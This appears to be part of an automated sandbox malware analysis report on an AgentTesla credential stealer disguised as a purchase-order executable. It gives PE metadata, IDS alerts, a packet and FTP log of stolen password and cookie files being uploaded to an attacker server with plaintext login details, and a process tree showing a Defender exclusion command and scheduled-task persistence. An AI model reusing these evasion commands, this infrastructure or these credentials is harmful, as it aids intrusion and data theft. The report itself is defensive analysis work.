                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x86f940x87000False0.942297815394data7.94405768333IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rsrc0x8a0000x8c0880x8c200False0.32665275145data4.87054153255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x1180000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x8a27c0x42028dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 16777215, next used block 16777215
                            RT_ICON0xcc2a40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 255, next used block 4294901760
                            RT_ICON0xd04cc0x25a8data
                            RT_ICON0xd2a740x10a8data
                            RT_ICON0xd3b1c0x988data
                            RT_ICON0xd44a40x468GLS_BINARY_LSB_FIRST
                            RT_RCDATA0xd490c0x41196PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            RT_GROUP_ICON0x115aa40x5adata
                            RT_VERSION0x115b000x3d4data
                            RT_MANIFEST0x115ed40x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Version Infos

                            DescriptionData
                            Translation0x0000 0x04b0
                            LegalCopyrightCopyright Earthworks Garden Kare
                            Assembly Version5.4.0.0
                            InternalNameMCMWrapperDictiona.exe
                            FileVersion5.4.0.0
                            CompanyNameEarthworks Garden Kare
                            LegalTrademarks
                            CommentsPrecision Instrument
                            ProductNameWpfClassProject
                            ProductVersion5.4.0.0
                            FileDescriptionWpfClassProject
                            OriginalFilenameMCMWrapperDictiona.exe

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            12/02/21-15:50:45.847582TCP2029927ET TROJAN AgentTesla Exfil via FTP4984221192.168.2.437.0.9.166
                            12/02/21-15:50:45.877380TCP2029928ET TROJAN AgentTesla HTML System Info Report Exfil via FTP4984335415192.168.2.437.0.9.166

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 2, 2021 15:48:51.160839081 CET49701443192.168.2.4204.79.197.222
                            Dec 2, 2021 15:48:51.178076982 CET44349701204.79.197.222192.168.2.4
                            Dec 2, 2021 15:48:51.179409027 CET44349701204.79.197.222192.168.2.4
                            Dec 2, 2021 15:48:51.179536104 CET49701443192.168.2.4204.79.197.222
                            Dec 2, 2021 15:48:51.179677963 CET44349701204.79.197.222192.168.2.4
                            Dec 2, 2021 15:48:51.179740906 CET49701443192.168.2.4204.79.197.222
                            Dec 2, 2021 15:49:41.805737972 CET804968895.140.230.128192.168.2.4
                            Dec 2, 2021 15:49:41.809340954 CET4968880192.168.2.495.140.230.128
                            Dec 2, 2021 15:49:41.809385061 CET4968880192.168.2.495.140.230.128
                            Dec 2, 2021 15:49:41.828016043 CET804968895.140.230.128192.168.2.4
                            Dec 2, 2021 15:49:41.983979940 CET4969080192.168.2.4173.222.108.210
                            Dec 2, 2021 15:49:42.001569986 CET8049690173.222.108.210192.168.2.4
                            Dec 2, 2021 15:49:42.001774073 CET4969080192.168.2.4173.222.108.210
                            Dec 2, 2021 15:49:42.237803936 CET804968993.184.220.29192.168.2.4
                            Dec 2, 2021 15:49:42.241417885 CET4968980192.168.2.493.184.220.29
                            Dec 2, 2021 15:49:43.183203936 CET804969693.184.220.29192.168.2.4
                            Dec 2, 2021 15:49:43.183366060 CET4969680192.168.2.493.184.220.29
                            Dec 2, 2021 15:49:43.676526070 CET49698443192.168.2.423.35.237.194
                            Dec 2, 2021 15:49:43.677586079 CET4969980192.168.2.493.184.220.29
                            Dec 2, 2021 15:49:44.528485060 CET804969793.184.220.29192.168.2.4
                            Dec 2, 2021 15:49:44.531683922 CET4969780192.168.2.493.184.220.29
                            Dec 2, 2021 15:49:44.806886911 CET804970293.184.220.29192.168.2.4
                            Dec 2, 2021 15:49:44.807045937 CET4970280192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:31.628712893 CET4968980192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:31.645936012 CET804968993.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:31.646069050 CET4968980192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:44.619083881 CET804969693.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:44.619232893 CET4969680192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:45.569679976 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.596926928 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.597012997 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.625675917 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.626494884 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.653775930 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.653798103 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.653995991 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.704344988 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.704607964 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.731904984 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.733582020 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.760883093 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.761142015 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.788554907 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.788990974 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.816318035 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.819623947 CET4984335415192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.846829891 CET354154984337.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.847034931 CET4984335415192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.847582102 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.874898911 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.877379894 CET4984335415192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.878398895 CET4984335415192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.904510975 CET354154984337.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.906085968 CET354154984337.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.906153917 CET4984335415192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.906277895 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:45.906393051 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:45.972192049 CET804969793.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:45.972445965 CET4969780192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:46.153683901 CET4434969413.107.42.16192.168.2.4
                            Dec 2, 2021 15:50:46.246741056 CET804970293.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:46.246814966 CET4970280192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:46.913746119 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:46.941128969 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:46.942430973 CET4984435382192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:46.969619989 CET353824984437.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:46.969749928 CET4984435382192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:46.970063925 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:46.997438908 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:47.001418114 CET4984435382192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:47.001723051 CET4984435382192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:47.028768063 CET353824984437.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:47.030636072 CET353824984437.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:47.030816078 CET4984435382192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:47.030967951 CET214984237.0.9.166192.168.2.4
                            Dec 2, 2021 15:50:47.031044006 CET4984221192.168.2.437.0.9.166
                            Dec 2, 2021 15:50:49.094901085 CET4434969513.107.5.88192.168.2.4
                            Dec 2, 2021 15:50:49.367887974 CET4434969313.107.5.88192.168.2.4
                            Dec 2, 2021 15:50:49.748274088 CET4434971213.107.246.254192.168.2.4
                            Dec 2, 2021 15:50:54.425327063 CET44349701204.79.197.222192.168.2.4
                            Dec 2, 2021 15:50:57.435750008 CET804969693.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:57.435844898 CET4969680192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:57.671641111 CET804969793.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:57.671808004 CET4969780192.168.2.493.184.220.29
                            Dec 2, 2021 15:50:58.710365057 CET804970293.184.220.29192.168.2.4
                            Dec 2, 2021 15:50:58.710522890 CET4970280192.168.2.493.184.220.29

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 2, 2021 15:50:45.443110943 CET5662153192.168.2.48.8.8.8
                            Dec 2, 2021 15:50:45.473076105 CET53566218.8.8.8192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Dec 2, 2021 15:50:45.443110943 CET192.168.2.48.8.8.80x3c9Standard query (0)ftp.pfsbankgroup.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Dec 2, 2021 15:50:45.473076105 CET8.8.8.8192.168.2.40x3c9No error (0)ftp.pfsbankgroup.com37.0.9.166A (IP address)IN (0x0001)

                            FTP Packets

                            TimestampSource PortDest PortSource IPDest IPCommands
                            Dec 2, 2021 15:50:45.625675917 CET214984237.0.9.166192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                            Dec 2, 2021 15:50:45.626494884 CET4984221192.168.2.437.0.9.166USER owo@pfsbankgroup.com
                            Dec 2, 2021 15:50:45.653798103 CET214984237.0.9.166192.168.2.4331 User owo@pfsbankgroup.com OK. Password required
                            Dec 2, 2021 15:50:45.653995991 CET4984221192.168.2.437.0.9.166PASS 7ujm7ygv
                            Dec 2, 2021 15:50:45.704344988 CET214984237.0.9.166192.168.2.4230-This server supports FXP transfers
                            230-This server supports FXP transfers230 OK. Current restricted directory is /
                            Dec 2, 2021 15:50:45.731904984 CET214984237.0.9.166192.168.2.4504 Unknown command
                            Dec 2, 2021 15:50:45.733582020 CET4984221192.168.2.437.0.9.166PWD
                            Dec 2, 2021 15:50:45.760883093 CET214984237.0.9.166192.168.2.4257 "/" is your current location
                            Dec 2, 2021 15:50:45.761142015 CET4984221192.168.2.437.0.9.166TYPE I
                            Dec 2, 2021 15:50:45.788554907 CET214984237.0.9.166192.168.2.4200 TYPE is now 8-bit binary
                            Dec 2, 2021 15:50:45.788990974 CET4984221192.168.2.437.0.9.166PASV
                            Dec 2, 2021 15:50:45.816318035 CET214984237.0.9.166192.168.2.4227 Entering Passive Mode (37,0,9,166,138,87)
                            Dec 2, 2021 15:50:45.847582102 CET4984221192.168.2.437.0.9.166STOR PW_user-965969_2021_12_02_18_59_06.html
                            Dec 2, 2021 15:50:45.874898911 CET214984237.0.9.166192.168.2.4150 Accepted data connection
                            Dec 2, 2021 15:50:45.906277895 CET214984237.0.9.166192.168.2.4226-File successfully transferred
                            226-File successfully transferred226 0.031 seconds (measured here), 13.98 Kbytes per second
                            Dec 2, 2021 15:50:46.913746119 CET4984221192.168.2.437.0.9.166PASV
                            Dec 2, 2021 15:50:46.941128969 CET214984237.0.9.166192.168.2.4227 Entering Passive Mode (37,0,9,166,138,54)
                            Dec 2, 2021 15:50:46.970063925 CET4984221192.168.2.437.0.9.166STOR CO_user-965969_2021_12_02_18_59_10.zip
                            Dec 2, 2021 15:50:46.997438908 CET214984237.0.9.166192.168.2.4150 Accepted data connection
                            Dec 2, 2021 15:50:47.030967951 CET214984237.0.9.166192.168.2.4226-File successfully transferred
                            226-File successfully transferred226 0.034 seconds (measured here), 38.56 Kbytes per second

                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:15:48:55
                            Start date:02/12/2021
                            Path:C:\Users\user\Desktop\PO02673492.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\PO02673492.exe"
                            Imagebase:0xfd0000
                            File size:1127936 bytes
                            MD5 hash:C6AEF3746AF5A5CEC52B4D15CBCBBDE2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            General

                            Start time:15:48:58
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                            Imagebase:0xdc0000
                            File size:430592 bytes
                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            General

                            Start time:15:48:59
                            Start date:02/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:15:48:59
                            Start date:02/12/2021
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp
                            Imagebase:0x980000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:15:49:00
                            Start date:02/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:15:49:01
                            Start date:02/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Imagebase:0x950000
                            File size:261728 bytes
                            MD5 hash:D621FD77BD585874F9686D3A76462EF1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.923580235.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.923580235.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.673240968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.673240968.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.673779627.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.673779627.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:high

                            Disassembly

                            Code Analysis

                            Reset < >